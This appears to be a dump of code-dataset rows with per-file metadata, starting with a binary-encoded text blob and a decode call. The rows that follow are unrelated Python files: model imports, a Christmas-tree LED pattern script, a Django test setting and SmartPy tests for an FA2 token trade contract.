101001110111011 101010001111100 101010000000001 100111000000000 100111000001011 111011010000100 11000000000010 101011100101000 110000000100101 1000101111001010 111100111010001 110101101111011 100111010100001 111011010000100 111010111000101 100111010111010 1001000011111101 110011000101111 110110010100001 110011100001001 1000101111001010 110010110101101 11000000000001 110110010100001 101001010011110 110110011010101 111100001101110 1000101111001010 111011010000100 111010111000101 100111110001011 1111111100001100 111101101001001 1000111111011001 100111000101010 111010110101011 110000011000101 1000111111000111 101001110111011 100111001001011 101010000001110 1111111100001100 110001000010001 101111000001100 110011100011011 1000000011111101 111111011011001 100111011010110 100111011101100 100111000000000 100111000101010 100111010100100 100111011100011 1111111100001100 111111011011001 100111011010110 100111011101100 111011010000100 101101110110110 101111010101101 100111000000000 100111010011011 101101110001001 110001010011010 1111111100001100 110001000010001 100111011101100 111011010000100 111010111000101 100111010111010 101111110001000 101001111101111 110000000011100 111011010000100 1111111100001100 101111110001000 101001111101111 110000000011100 11000000000010 1010 1010 11000000001100 101111001111000 1000111111010000 11000000001101 1010 1010 101000001011010 100111010000110 1000111111011001 100111001001000 101100100011010 101111001110100 101001100111011 111010100011111 1111111100001100 110001000010001 100111000000000 111011011110100 1000100111001001 101111110010111 110110010100001 110011100001001 100111011000000 100111001001000 101011011110000 1001011010111110 1000000011111101 101100100011111 110001001010011 101000000010010 110001000010001 1111111100001100 1000111111011001 100111001011111 101010010001100 110001000010001 111011010000100 111111011001111 101001110000110 11000000000001 100111000101010 110000000100111 110011100001001 101000101110011 11000000000010 1010 1010 
111001 101110010000001 1001000010100011 101111001110100 110001000010001 111001000111000 111001000111000 101110000110001 1000000011000011 111011001001100 101001110111011 100111000010110 100111010000110 1111111100001100 1001000010100011 100111000101010 110010111110110 101000000011001 110001000010001 101110000110001 110000011110011 111011101000000 1001010101111111 101100100100111 100111010000110 101111101010011 100111000101010 101001100111011 111010100011111 101001110111011 110010101010001 101001000101011 100111010111010 111011010000100 101010001111101 11000000000010 101010000001110 110011101100101 1001101011011000 1000000000000011 111011010000100 110010111110110 101000000011001 1111111100001100 110001000010001 111011010000100 101111111010111 110000100111111 101100001101011 111011010000100 101000101101000 1001000011101000 1001000011111101 110011000101111 101001100111011 101101101100110 100111000010011 100111000011010 1111111100001100 110011100000000 101010000001110 1000000000000011 101001111010110 100111010000110 101010000001100 110110101001110 101001100111011 101101101100110 1001011001100010 11000000000010 110001 111001 111001 110111 101111001110100 110001000010001 101100100100111 101101101100110 110101111010101 100111000011010 1111111100001100 101110000110001 101001000110000 100111010000110 100111000101101 101111111000011 101001100111011 1001011001100010 1111111100001100 100111001001011 101001001001101 101011100101000 101111111000011 1000100001000000 111101110100001 101000110000101 111100111010001 101110111100101 100111101011100 1111111100001100 110010 110000 110001 110000 101111001110100 101001000110000 110000000100101 1000101111001010 111100111010001 101111101010011 100111000111011 100111011111011 111011010000100 11000000000010 1010 1010 110001000010001 1000100111001001 101111110010111 110000000100101 1000101111001010 111100111010001 101110000110001 101000011001111 110001000010001 111011010000100 100111000000000 100111000101010 101101101101001 101101101010000 
100111000000000 110100000110111 1111111100001100 110001000010001 110001010001010 101101110000011 110010000011110 110001000010000 1000111111011001 100111001001000 101100100100111 1111111100001100 110010000011110 101111110010111 101100100100111 101101110110110 101011011100010 111111011010011 1000110101110111 110011101100101 1111111100001100 101000001011010 110001000010000 1000111111011001 100111000101010 101110001000000 1001011101100010 100111000001101 101101110111001 110011000010011 1111111100001100 110001001000000 100111011100101 101111110001000 111001111001101 110000011011100 1111111100001100 1001011101011110 101111000111000 111001111001101 110000011011100 1000111111011001 100111000101010 1001011011000110 100111101010011 11000000000010 1010 1010 101001001001101 101000111100000 101100100101001 1111111100001100 110001000010001 111011010000100 100111000000000 100111000101010 110001010100100 101100011101011 101001111010001 110011100001011 101001111001011 101011100001000 1000101111110100 1111111100001100 101100101111101 110000000000000 101111111110101 100111011100101 101001001001101 101111111011001 111100010001100 111011010000100 101100100100111 110000000100101 1000101111001010 1111111100001100 1001000010100011 111100111001101 101111111011001 1000110111011111 1000111111011001 111100111001101 101111111011001 101101110001100 101000101101000 110011000101111 100111000100100 100111000101010 110100110000010 101111111110101 11000000000010 1010 1010 101011100101000 1000111111011001 110101100100001 111010110101011 110000011000101 100111001001011 101001001001101 1111111100001100 101111111000011 110100010010111 11000000000001 1000000100010001 110100010010111 11000000000001 110110110001000 101001100010110 1001000001010011 101000111111010 1000100001000000 11000000000001 101100100010110 100111100100100 111101101001001 111101101001001 1000111111011001 100111010011011 110001001001101 110011000101111 110001000010001 100111011101100 110000000100101 1000101111001010 111011010000100 
1000001100000011 111010101110100 11000000000010 1001000010100011 111100111001101 101111111011001 110011000101111 110011100001001 110001000010000 101110000110001 110000100011111 111011010000100 101111111011001 1111111100001100 111011011101110 111011010000100 110011000001110 111100001101110 1111111100001100 1001010010001000 101101111111001 101010000000100 111100111001101 111110001111011 101011110001011 111011010000100 111010111000101 100111010111010 1001000011111101 110011100001001 101111110001000 1001000000011010 111010101000101 111011010000100 110110101000001 111101000001011 1111111100001100 101111110001000 110001000010000 111000110011111 1111111100001100 100111000001011 100111000000000 110101101100101 101111001110010 100111011000000 100111001001000 1111111100001100 110000000001110 100111001001000 101000001011010 1111111100001100 101000111111010 100111010000110 1001010111101110 1001100010011000 110001001111110 101010011101010 100111000000000 100111000101010 11000000000010 1000000000001100 1000111111011001 100111000000000 110101100100001 110011000101111 1000111111011001 100111001001000 101100100011010 101001101110001 1001000111001101 111010111000101 100111010111010 110110010100001 101001010011110 110110011010101 101001110111011 101100100000100 111010000000110 1111111100001100 110110010100001 101001010011110 110110011010101 110010100110110 100111101001111 1001011001100010 1111111100001100 1000000000001100 100111000010100 110001000010001 100111011101100 101001100111011 101001010100001 100111010111010 101010001011000 1000111111011000 101011100101000 1000111111011001 111100111001101 1001100011001110 1001011001101001 100111001001011 100111000101101 1111111100001100 1000111111011001 111100111001101 101111111011001 111011100011111 111011010000100 101111110001000 110010111100000 101100101001000 1111111100001100 101111110001000 111010111011011 101111111000011 11000000000010 1010 1010 110011100001001 100111000000000 101100100101001 110010111101001 100111000001010 111000 
111000010111001 1111111100001100 110001000010001 100111011101100 111100111010001 100111000000000 100111000101010 101111001110100 1000111101111011 101001100111011 111010100011111 1000110111011111 110001000010001 101001111010001 101111110101110 100111111100001 1111111100001100 100111001011111 110011000101111 1000011011101110 110011100001001 110000000100111 110100000111100 111011010000100 1111111100001100 1000101111110100 110001000010001 100111011001010 101100100101001 100111000001101 110011101100101 100111000001010 111001111101101 100111010000110 1111111100001100 100111000001101 1000001000010010 110011100001101 11000000000010 101011011100000 100111000111010 110001000010001 100111011101100 1000111111011001 1001000111001100 1001000011111101 110011100001001 1000100111000100 111011111101001 111011010000100 1111111100001100 100111101100000 100111000001101 1000001000010010 110011100001101 1000100110000001 110001111010000 101001001001101 1000110111011111 110001000010001 1000101111110100 101100101111101 101101110001001 110001110010010 1111111100001100 100111101100000 101001000110000 111000 111000010111001 1001010010011111 1000110111011111 110001000010001 1000101111110100 1111111100001100 110001000010001 101001000110000 101010011101010 1001000111001100 101001110111011 110001001111110 100111010111010 11000000000010 100111011010110 101011100101000 101111110101110 100111111100001 100111000101101 101101111111001 110001000010001 101001111010001 1000000100111110 110110000010100 1111111100001100 1000101111110100 101100100100111 1001000111001111 111011010000100 1001101011011000 101111010100110 111010110010001 100111100111100 111010111000101 100111110001011 1000100010101011 100111101100000 1001100010000110 101101111111100 111011010000100 110000000100101 1000101111001010 111100111010001 110010100111110 101011011011110 111100100111110 100111100011010 1111111100001100 110001000010001 100111011101100 1000111111011001 110011000101111 100111101011100 101101101111101 1111111100000001 
110001000010001 111010000000110 1000100111100011 100111011010110 110011000101111 101011011100000 100111000111010 100111101011100 100111000111010 101001100111011 111010100011111 111011010000100 1000001001101111 111011111100101 1111111100001100 100111101000110 110001000010001 100111001011111 110000000100101 100111010000110 1111111100001100 110001000010001 1000101111110100 100111101100000 101001111101111 100111011100101 101001110111011 101010001001010 110001000010001 1111111100001100 101100110000010 110011110011100 100111101100000 110011000101111 110000000100101 1000101111001010 111100111010001 100111000111011 100111011111011 1111111100001100 100111101100000 1000101111100101 110000000001110 100111001001000 101001010011110 1111111100011111 1010 1010 101010000001110 110011101100101 1111111100001100 1000111111011001 100111000101010 101001100111011 111010100011111 100111100010001 110000001101111 100111010000110 101000111100000 101100100101001 101010000001110 1111111100001100 1000111111011000 110011000101111 111000101100111 110100000110111 110011101100101 101110111100101 100111101011100 11000000000010 100111011010110 100111000001101 110011000101111 1000101111110100 110000000010101 110101101111011 110000000010101 111110100101111 1111111100001100 1000000000001100 110011000101111 1001000001000111 101001000110000 1000111111011001 111100111001101 110000011000101 101000110110101 1111111100001100 100111000000000 100111000001011 101101101010000 1001011101100010 101101111111001 1000111111011001 100111001001000 101100100011010 111010111000101 100111010111010 110000100011111 101001000110000 101111110001000 101110100101001 110111010000011 11000000000010 1010 1010 100111101011100 100111000111010 101001100111011 111010100011111 110011101100101 1000101111110100 1111111100001100 111001001111001 101001000101011 110011000101111 101010000001110 1001011101100010 101111110001000 101100100011010 110011101100101 110010100101111 110001111110100 111011010000100 101001100111011 111010100011111 
1111111100001100 110100000111001 110011100101100 101111111000011 111010000000110 100111000001010 101001111010111 100111000001101 100111010000110 1111111100001100 111100010110000 101001000110000 1000111111011001 111100111001101 110000011000101 101000110110101 110000111110101 100111010000110 1111111100001100 110011100001001 111011010000100 101001100111011 111010100011111 11000000000001 110001010100100 101100011101011 101110000110001 101010011101101 11000000000010 100111000000000 100111000101010 110011000101111 101010011101101 101001000101011 100111010111010 1111111100001100 101000110001101 100111000000000 100111000101010 100111001011111 110011000101111 101010011101101 1000000111101010 101110111110001 1111111100001100 101011011100000 100111000111010 110101111001111 100111000101010 100111010111010 1001000011111101 100111000001101 111011111100101 1001000001010011 100111011000000 100111001001000 110010111110110 101000000011001 101110000110001 1000111101101110 101001000110000 1000000111101010 101110111110001 110000100011111 110011111010011 11000000000010 1010 1010 101100100100111 110100110000010 101011100101000 110001 110011100001000 100111000101101 100111000001011 110010111101100 1111111100001100 101001100111011 1001011001100010 111011010000100 1001100010000110 101101111111100 100111001011111 1001011001000110 1001011001000110 111111011101101 111111011101101 101011100110000 1001000011111101 111010111000101 101000000010010 100111010000110 1111111100001100 101001100000101 110001011101100 110001000010001 100111011101100 111011010000100 1001010111101000 101001010011110 100111000111011 100111011111011 1111111100001100 100111000001001 100111101001101 101001001101111 1001011001100010 1001010101111111 11000000000010 101001100111011 101001010100001 111100111010001 111100111010001 1001010101111111 111011010000100 101100101110011 101000100111111 100111001011111 111010111000101 100111010000110 1111111100001100 100111011010110 100111001011111 101011100101000 101101110110110 
1001000111001100 100111100010001 110000001101111 11000000000010 […binary-encoded payload elided: several thousand space-separated binary tokens, apparently one Unicode code point per token, decoded by the call below…] 101111001111000 111100110001111 11000000000010"
decode(text)
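The `decode` function applied here is not defined in this excerpt. Judging from the space-separated binary tokens themselves (for example `1010` is 10, a newline, and values such as `100111000000000` fall in the CJK code-point range), a plausible reading is that each token is one character's Unicode code point written in binary. A minimal sketch under that assumption — the behaviour is inferred, not taken from the source:

```python
def decode(text: str) -> str:
    """Turn space-separated binary tokens into the characters they encode.

    Each token is parsed as a base-2 integer and mapped to its Unicode
    code point, so "1000001" -> chr(65) -> "A".
    """
    return "".join(chr(int(token, 2)) for token in text.split())


# Example: two ASCII letters, a newline token, then the digits "10".
print(decode("1000001 1000010 1010 110001 110000"))  # prints "AB", then "10"
```

On this reading, the long blob above is simply ordinary text stored one code point per token, and `decode(text)` reverses that encoding in a single pass.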
| 5,280.192308 | 136,848 | 0.935412 | 8,743 | 137,285 | 14.685577 | 0.110832 | 0.005234 | 0.011651 | 0.00317 | 0.152146 | 0.114793 | 0.09519 | 0.081077 | 0.077713 | 0.074551 | 0 | 0.997331 | 0.064049 | 137,285 | 25 | 136,849 | 5,491.4 | 0.001922 | 0 | 0 | 0.235294 | 0 | 0.058824 | 0.996955 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0 | 0.117647 | 0.117647 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7a5acbb190a1bd695ca281787eec29f623ad2b3f | 327 | py | Python | ravens/models/__init__.py | EricCousineau-TRI/deformable-ravens | 6ff2443ba7f6673ba4696484e052441262cc14d7 | [
"Apache-2.0"
] | 98 | 2020-12-23T02:32:01.000Z | 2022-03-30T07:09:59.000Z | ravens/models/__init__.py | EricCousineau-TRI/deformable-ravens | 6ff2443ba7f6673ba4696484e052441262cc14d7 | [
"Apache-2.0"
] | 8 | 2020-12-22T16:17:24.000Z | 2021-10-13T23:44:48.000Z | ravens/models/__init__.py | EricCousineau-TRI/deformable-ravens | 6ff2443ba7f6673ba4696484e052441262cc14d7 | [
"Apache-2.0"
] | 26 | 2020-12-22T16:14:11.000Z | 2022-03-03T10:27:29.000Z | from ravens.models.gt_state import MlpModel
from ravens.models.resnet import ResNet43_8s
from ravens.models.attention import Attention
from ravens.models.transport import Transport
from ravens.models.transport_goal import TransportGoal
from ravens.models.conv_mlp import ConvMLP
from ravens.models.regression import Regression
| 40.875 | 54 | 0.87156 | 46 | 327 | 6.108696 | 0.391304 | 0.24911 | 0.398577 | 0.177936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010033 | 0.085627 | 327 | 7 | 55 | 46.714286 | 0.929766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8fcce66e723f1a660c65f5ab91c61908fae6faf6 | 1,587 | py | Python | scripts/row_by_row.py | limsim/rgbxmastree | d10aa7dc47bb2a296d81ac0d8b1d8f199cb82dda | [
"Apache-2.0"
] | 2 | 2021-12-05T21:19:06.000Z | 2021-12-13T04:34:10.000Z | scripts/row_by_row.py | limsim/rgbxmastree | d10aa7dc47bb2a296d81ac0d8b1d8f199cb82dda | [
"Apache-2.0"
] | 1 | 2021-12-05T21:40:32.000Z | 2021-12-06T21:03:15.000Z | scripts/row_by_row.py | limsim/rgbxmastree | d10aa7dc47bb2a296d81ac0d8b1d8f199cb82dda | [
"Apache-2.0"
] | 1 | 2021-11-11T18:12:58.000Z | 2021-11-11T18:12:58.000Z | from tree import RGBXmasTree
from colorzero import Color, Hue  # imported but never used in this script
from time import sleep
import random  # imported but never used in this script
tree = RGBXmasTree()
tree.brightness = 0.04
try:
    # Physical LED index order by row; defined but not used in the loop below.
    rowOrder = [0,24,19,6,12,16,15,7,1,23,20,5,11,17,14,8,2,22,21,4,10,18,13,9]
row1 = [(1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1)]
row2 = [(1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (0, 0, 0), (1, 1, 1), (1, 1, 1), (0, 0, 0), (0, 0, 0), (1, 1, 1), (1, 1, 1)]
row3 = [(1, 1, 1), (1, 1, 1), (1, 1, 1), (0, 0, 0), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1)]
allRows = [row1, row2, row3]
while True:
darkTree = [(0,0,0)] * 25
for j in range(3):
tree.value = allRows[j]
sleep(1)
tree.off()
# tree.value = [
# (1,1,1), (0,0,0), (0,0,0), (0,0,0), (0,0,0),
# (1,1,1), (1,1,1), (0,0,0), (0,0,0), (0,0,0),
# (0,0,0), (1,1,1), (0,0,0), (0,0,0), (1,1,1),
# (1,1,1), (0,0,0), (0,0,0), (1,1,1), (0,0,0),
# (0,0,0), (0,0,0), (0,0,0), (1,1,1), (0,0,0)
# ]
except KeyboardInterrupt:
tree.off()
tree.close() | 41.763158 | 284 | 0.383113 | 382 | 1,587 | 1.591623 | 0.146597 | 0.486842 | 0.631579 | 0.710526 | 0.493421 | 0.493421 | 0.493421 | 0.493421 | 0.493421 | 0.493421 | 0 | 0.298069 | 0.249527 | 1,587 | 38 | 285 | 41.763158 | 0.212427 | 0.15753 | 0 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.190476 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
890ba818ecf1a57a581739a5eea572fbefa172a3 | 98 | py | Python | memcachepool/tests/__init__.py | dudeitscesar/django-memcached-pool | b1521d5894174cf02720a6946c58249bd3995571 | [
"Apache-2.0"
] | 22 | 2015-01-05T16:21:10.000Z | 2021-03-15T11:59:57.000Z | memcachepool/tests/__init__.py | dudeitscesar/django-memcached-pool | b1521d5894174cf02720a6946c58249bd3995571 | [
"Apache-2.0"
] | 8 | 2015-01-05T18:18:24.000Z | 2022-01-19T14:30:09.000Z | memcachepool/tests/__init__.py | dudeitscesar/django-memcached-pool | b1521d5894174cf02720a6946c58249bd3995571 | [
"Apache-2.0"
] | 10 | 2015-01-27T00:21:22.000Z | 2021-06-25T17:09:18.000Z | import os
def setUp():
    os.environ['DJANGO_SETTINGS_MODULE'] = 'memcachepool.tests.settings'
| 16.333333 | 72 | 0.734694 | 12 | 98 | 5.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132653 | 98 | 5 | 73 | 19.6 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8918123fbc39bf09677ed8df18381cde9705a4bd | 38 | py | Python | losses/xentropy_loss.py | mo-vic/standalone-center-loss | 49730909be09d4eefbd43511227f4e787ad8af51 | [
"MIT"
] | 9 | 2019-09-09T00:29:16.000Z | 2020-03-25T10:18:07.000Z | losses/xentropy_loss.py | mo-vic/ConvLSTM | ce4b57b9370563b1cc90e3e2d0266288dbe6236f | [
"MIT"
] | null | null | null | losses/xentropy_loss.py | mo-vic/ConvLSTM | ce4b57b9370563b1cc90e3e2d0266288dbe6236f | [
"MIT"
] | null | null | null | from torch.nn import CrossEntropyLoss
| 19 | 37 | 0.868421 | 5 | 38 | 6.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.970588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
64df32d91b74150dfdaf7f131f5b370d59b832fd | 9,302 | py | Python | smart-contracts/metaverseTrade_test.py | i3games/the-swap | 2acc01ab26407c15cf8868290db47fae723ac7f2 | [
"MIT"
] | 5 | 2021-12-24T00:54:45.000Z | 2022-03-04T09:27:42.000Z | smart-contracts/metaverseTrade_test.py | i3games/the-swap | 2acc01ab26407c15cf8868290db47fae723ac7f2 | [
"MIT"
] | null | null | null | smart-contracts/metaverseTrade_test.py | i3games/the-swap | 2acc01ab26407c15cf8868290db47fae723ac7f2 | [
"MIT"
] | null | null | null | """Unit tests for the MetaverseTrade class.
"""
import smartpy as sp
# Import the metaverseTrade and fa2Contract modules
metaverseTrade = sp.io.import_script_from_url("file:metaverseTrade.py")
fa2Contract = sp.io.import_script_from_url("file:templates/fa2Contract.py")
def get_test_environment():
    # Create the test accounts
    user1 = sp.test_account("user1")
    user2 = sp.test_account("user2")
    user3 = sp.test_account("user3")
    fa2_admin = sp.test_account("fa2_admin")

    # Initialize the FA2 contract
    fa2 = fa2Contract.FA2(
        config=fa2Contract.FA2_config(),
        admin=fa2_admin.address,
        metadata=sp.utils.metadata_of_url("ipfs://aaa"))

    # Initialize the metaverse trade contract
    tradeContract = metaverseTrade.MetaverseTrade(
        metadata=sp.utils.metadata_of_url("ipfs://bbb"),
        fa2=fa2.address,
        expiration_time=5)

    # Add all the contracts to the test scenario
    scenario = sp.test_scenario()
    scenario += fa2
    scenario += tradeContract

    # Save all the variables in a test environment dictionary
    testEnvironment = {
        "scenario": scenario,
        "user1": user1,
        "user2": user2,
        "user3": user3,
        "fa2_admin": fa2_admin,
        "fa2": fa2,
        "tradeContract": tradeContract}

    return testEnvironment
@sp.add_test(name="Test trade")
def test_trade():
    # Get the test environment
    testEnvironment = get_test_environment()
    scenario = testEnvironment["scenario"]
    user1 = testEnvironment["user1"]
    user2 = testEnvironment["user2"]
    user3 = testEnvironment["user3"]
    fa2_admin = testEnvironment["fa2_admin"]
    fa2 = testEnvironment["fa2"]
    tradeContract = testEnvironment["tradeContract"]

    # Mint some tokens
    fa2.mint(
        address=user1.address,
        token_id=sp.nat(0),
        amount=sp.nat(100),
        metadata={"" : sp.utils.bytes_of_string("ipfs://ccc")}).run(sender=fa2_admin)
    fa2.mint(
        address=user1.address,
        token_id=sp.nat(1),
        amount=sp.nat(100),
        metadata={"" : sp.utils.bytes_of_string("ipfs://ddd")}).run(sender=fa2_admin)
    fa2.mint(
        address=user2.address,
        token_id=sp.nat(2),
        amount=sp.nat(100),
        metadata={"" : sp.utils.bytes_of_string("ipfs://eee")}).run(sender=fa2_admin)
    fa2.mint(
        address=user3.address,
        token_id=sp.nat(3),
        amount=sp.nat(100),
        metadata={"" : sp.utils.bytes_of_string("ipfs://eee")}).run(sender=fa2_admin)

    # Add the trade contract as operator for the tokens
    scenario += fa2.update_operators(
        [sp.variant("add_operator", fa2.operator_param.make(
            owner=user1.address,
            operator=tradeContract.address,
            token_id=0)),
         sp.variant("add_operator", fa2.operator_param.make(
            owner=user1.address,
            operator=tradeContract.address,
            token_id=1)),
         sp.variant("add_operator", fa2.operator_param.make(
            owner=user1.address,
            operator=tradeContract.address,
            token_id=2))]).run(sender=user1)
    scenario += fa2.update_operators(
        [sp.variant("add_operator", fa2.operator_param.make(
            owner=user2.address,
            operator=tradeContract.address,
            token_id=2))]).run(sender=user2)
    scenario += fa2.update_operators(
        [sp.variant("add_operator", fa2.operator_param.make(
            owner=user3.address,
            operator=tradeContract.address,
            token_id=3))]).run(sender=user3)

    # Check that the FA2 contract ledger information is correct
    scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100)
    scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
    scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
    scenario.verify(fa2.data.ledger[(user3.address, 3)].balance == 100)

    # Check that user 1 cannot propose a trade with a token it doesn't own
    scenario += tradeContract.propose_trade(
        token=2,
        for_token=3).run(valid=False, sender=user1)

    # User 1 proposes a trade
    scenario += tradeContract.propose_trade(
        token=0,
        for_token=2).run(valid=False, sender=user1, amount=sp.tez(3))
    scenario += tradeContract.propose_trade(
        token=0,
        for_token=2).run(sender=user1)

    # Check that the FA2 contract ledger information is correct
    scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100 - 1)
    scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
    scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
    scenario.verify(fa2.data.ledger[(user3.address, 3)].balance == 100)
    scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 1)

    # Check that the third user cannot accept the trade because it doesn't own
    # the requested token
    scenario += tradeContract.accept_trade(0).run(valid=False, sender=user3)

    # The second user accepts the trade
    scenario += tradeContract.accept_trade(0).run(valid=False, sender=user2, amount=sp.tez(3))
    scenario += tradeContract.accept_trade(0).run(sender=user2)

    # Check that the FA2 contract ledger information is correct
    scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100 - 1)
    scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
    scenario.verify(fa2.data.ledger[(user1.address, 2)].balance == 1)
    scenario.verify(fa2.data.ledger[(user2.address, 0)].balance == 1)
    scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100 - 1)
    scenario.verify(fa2.data.ledger[(user3.address, 3)].balance == 100)
    scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 0)

    # Check that the second user cannot accept the trade twice
    scenario += tradeContract.accept_trade(0).run(valid=False, sender=user2)

    # Check that the first user cannot cancel the trade because it has already
    # been executed
    scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user1)
@sp.add_test(name="Test cancel trade")
def test_cancel_trade():
    # Get the test environment
    testEnvironment = get_test_environment()
    scenario = testEnvironment["scenario"]
    user1 = testEnvironment["user1"]
    user2 = testEnvironment["user2"]
    fa2_admin = testEnvironment["fa2_admin"]
    fa2 = testEnvironment["fa2"]
    tradeContract = testEnvironment["tradeContract"]

    # Mint some tokens
    fa2.mint(
        address=user1.address,
        token_id=sp.nat(0),
        amount=sp.nat(100),
        metadata={"" : sp.utils.bytes_of_string("ipfs://ccc")}).run(sender=fa2_admin)
    fa2.mint(
        address=user1.address,
        token_id=sp.nat(1),
        amount=sp.nat(100),
        metadata={"" : sp.utils.bytes_of_string("ipfs://ddd")}).run(sender=fa2_admin)
    fa2.mint(
        address=user2.address,
        token_id=sp.nat(2),
        amount=sp.nat(100),
        metadata={"" : sp.utils.bytes_of_string("ipfs://eee")}).run(sender=fa2_admin)

    # Add the trade contract as operator for the tokens
    scenario += fa2.update_operators(
        [sp.variant("add_operator", fa2.operator_param.make(
            owner=user1.address,
            operator=tradeContract.address,
            token_id=0)),
         sp.variant("add_operator", fa2.operator_param.make(
            owner=user1.address,
            operator=tradeContract.address,
            token_id=1))]).run(sender=user1)
    scenario += fa2.update_operators(
        [sp.variant("add_operator", fa2.operator_param.make(
            owner=user2.address,
            operator=tradeContract.address,
            token_id=2))]).run(sender=user2)

    # Check that the FA2 contract ledger information is correct
    scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100)
    scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
    scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)

    # User 1 proposes a trade
    scenario += tradeContract.propose_trade(
        token=0,
        for_token=2).run(sender=user1)

    # Check that the FA2 contract ledger information is correct
    scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100 - 1)
    scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
    scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
    scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 1)

    # Check that the second user cannot cancel the trade
    scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user2)

    # User 1 cancels the trade
    scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user1, amount=sp.tez(3))
    scenario += tradeContract.cancel_trade(0).run(sender=user1)

    # Check that the FA2 contract ledger information is correct
    scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100)
    scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
    scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
    scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 0)

    # Check that the first user cannot cancel the trade again
    scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user1)
